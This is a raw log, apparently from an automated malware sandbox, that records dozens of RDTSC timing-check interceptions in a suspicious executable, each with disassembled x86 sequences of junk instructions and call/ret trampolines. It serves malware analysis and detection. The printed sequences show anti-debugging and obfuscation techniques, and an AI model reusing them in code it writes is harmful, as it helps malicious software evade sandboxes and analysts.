Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA025 second address: ABA029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA1B8 second address: ABA1C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5BD0C7BA66h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA5AF second address: ABA5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F5BD0FFF0D3h 0x0000000f jmp 00007F5BD0FFF0D8h 0x00000014 jmp 00007F5BD0FFF0D6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA5FB second address: ABA600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA600 second address: ABA60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA60F second address: ABA615 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA8C6 second address: ABA8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABA8CC second address: ABA8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA77h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC888 second address: ABC8B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F5BD0FFF0CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC8B2 second address: ABC8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC90E second address: ABC91B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC91B second address: ABC940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jo 00007F5BD0C7BA70h 0x00000010 pushad 0x00000011 jl 00007F5BD0C7BA66h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f ja 00007F5BD0C7BA66h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABC940 second address: ABC95B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jns 00007F5BD0FFF0C6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABCD0F second address: ABCD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABCD15 second address: ABCD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABCEBB second address: ABCEC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABCEC5 second address: ABCEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABD404 second address: ABD411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABD411 second address: ABD415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABD415 second address: ABD41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABD41B second address: ABD42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABDFE5 second address: ABDFEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABDFEB second address: ABE02B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub edi, dword ptr [ebp+12A32B46h] 0x0000000f push 00000000h 0x00000011 jmp 00007F5BD0FFF0D7h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+12A31AEBh], esi 0x0000001e push eax 0x0000001f pushad 0x00000020 jmp 00007F5BD0FFF0CBh 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ABFAAA second address: ABFB3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F5BD0C7BA68h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F5BD0C7BA68h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 movzx edi, bx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F5BD0C7BA68h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 xchg eax, ebx 0x00000049 pushad 0x0000004a js 00007F5BD0C7BA7Dh 0x00000050 jmp 00007F5BD0C7BA77h 0x00000055 jl 00007F5BD0C7BA6Ch 0x0000005b jng 00007F5BD0C7BA66h 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F5BD0C7BA6Eh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC04F5 second address: AC0567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F5BD0FFF0C8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+12A31908h], ebx 0x0000002c mov si, bx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F5BD0FFF0C8h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b push 00000000h 0x0000004d jmp 00007F5BD0FFF0CEh 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC02B9 second address: AC02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC0567 second address: AC056D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC02BE second address: AC02D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA75h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC02D7 second address: AC02FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f jmp 00007F5BD0FFF0D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC0F9D second address: AC0FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5BD0C7BA66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC106A second address: AC106E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A83B48 second address: A83B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC2333 second address: AC2337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: A83B4E second address: A83B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC3C2C second address: AC3C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0FFF0CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC4454 second address: AC4458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC71AC second address: AC71C0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5BD0FFF0C6h 0x00000008 jmp 00007F5BD0FFF0CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC71C0 second address: AC71CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC71CA second address: AC71EE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BD0FFF0D8h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC7A75 second address: AC7A90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACA913 second address: ACA917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AC9A1A second address: AC9A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007F5BD0C7BA68h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov bx, 673Bh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F5BD0C7BA68h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov ebx, edi 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov eax, dword ptr [ebp+12A30C59h] 0x00000043 mov dword ptr [ebp+12A317A9h], ebx 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, 582BF3E0h 0x00000050 push eax 0x00000051 push esi 0x00000052 je 00007F5BD0C7BA6Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACAAFC second address: ACAB01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACAB01 second address: ACAB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCDE second address: ACDCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCE3 second address: ACDCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDCED second address: ACDD63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BD0FFF0C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BD0FFF0CEh 0x00000013 pop edx 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+12A317DCh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F5BD0FFF0C8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 mov edi, dword ptr [ebp+12A337A1h] 0x0000003d push 00000000h 0x0000003f mov ebx, dword ptr [ebp+12A32A3Ah] 0x00000045 ja 00007F5BD0FFF0CCh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F5BD0FFF0D3h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9D7 second address: ACB9F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9F6 second address: ACB9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACB9FB second address: ACBA17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BD0C7BA78h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBAD6 second address: ACBADC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBADC second address: ACBAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACBAE1 second address: ACBAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACED0C second address: ACED5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F5BD0C7BA66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f sub bh, 00000002h 0x00000012 push 00000000h 0x00000014 or bx, FA97h 0x00000019 push 00000000h 0x0000001b movsx edi, di 0x0000001e xchg eax, esi 0x0000001f jno 00007F5BD0C7BA70h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jno 00007F5BD0C7BA7Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDEE1 second address: ACDF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0FFF0CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+12A32624h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007F5BD0FFF0C8h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+12A33410h] 0x0000003e jmp 00007F5BD0FFF0D1h 0x00000043 mov eax, dword ptr [ebp+12A302B1h] 0x00000049 mov ebx, 6E65F2AFh 0x0000004e or dword ptr [ebp+12BD06C8h], ecx 0x00000054 push FFFFFFFFh 0x00000056 xor ebx, dword ptr [ebp+12BD7BA9h] 0x0000005c nop 0x0000005d je 00007F5BD0FFF0E3h 0x00000063 pushad 0x00000064 push edx 0x00000065 pop edx 0x00000066 jmp 00007F5BD0FFF0D9h 0x0000006b popad 0x0000006c push eax 0x0000006d push ecx 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F5BD0FFF0D4h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACDF8F second address: ACDF93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: ACEF46 second address: ACEF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD08E9 second address: AD093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 nop 0x00000007 mov ebx, dword ptr [ebp+12A32ABEh] 0x0000000d xor dword ptr [ebp+12BD24C1h], ebx 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 mov si, ax 0x00000019 stc 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F5BD0C7BA68h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Bh 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov ebx, dword ptr [ebp+12A31A77h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F5BD0C7BA6Ah 0x00000045 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD1AEC second address: AD1AF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD29D9 second address: AD2A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5BD0C7BA68h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+12A3181Fh], esi 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub dword ptr [ebp+12A3181Fh], edi 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov dword ptr [ebp+12BAE704h], edi 0x00000042 mov eax, dword ptr [ebp+12A30735h] 0x00000048 jg 00007F5BD0C7BA69h 0x0000004e push FFFFFFFFh 0x00000050 mov edi, ebx 0x00000052 mov dword ptr [ebp+12BAA258h], ecx 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push ecx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A3D second address: AD2A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A42 second address: AD2A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD2A4C second address: AD2A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD492E second address: AD4932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD585A second address: AD585F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD585F second address: AD5887 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnc 00007F5BD0C7BA7Bh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD779C second address: AD77A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD5887 second address: AD5919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5BD0C7BA75h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F5BD0C7BA68h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 sbb bl, 00000012h 0x00000029 cld 0x0000002a push dword ptr fs:[00000000h] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F5BD0C7BA68h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000016h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b or di, 3887h 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 mov edi, dword ptr [ebp+12A32B56h] 0x0000005d mov eax, dword ptr [ebp+12A3051Dh] 0x00000063 add dword ptr [ebp+12A337CCh], eax 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+12A3270Ah], edx 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push edi 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD5919 second address: AD591E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AD79A7 second address: AD79AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE16DD second address: AE16E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE16E9 second address: AE1714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BD0C7BA66h 0x0000000a pop edx 0x0000000b jmp 00007F5BD0C7BA78h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F5BD0C7BA66h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exeRDTSC instruction interceptor: First address: AE0E7D second address: AE0E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F5BD0FFF0C6h 0x0000000c jnl 00007F5BD0FFF0C6h 0x00000012 rdtsc
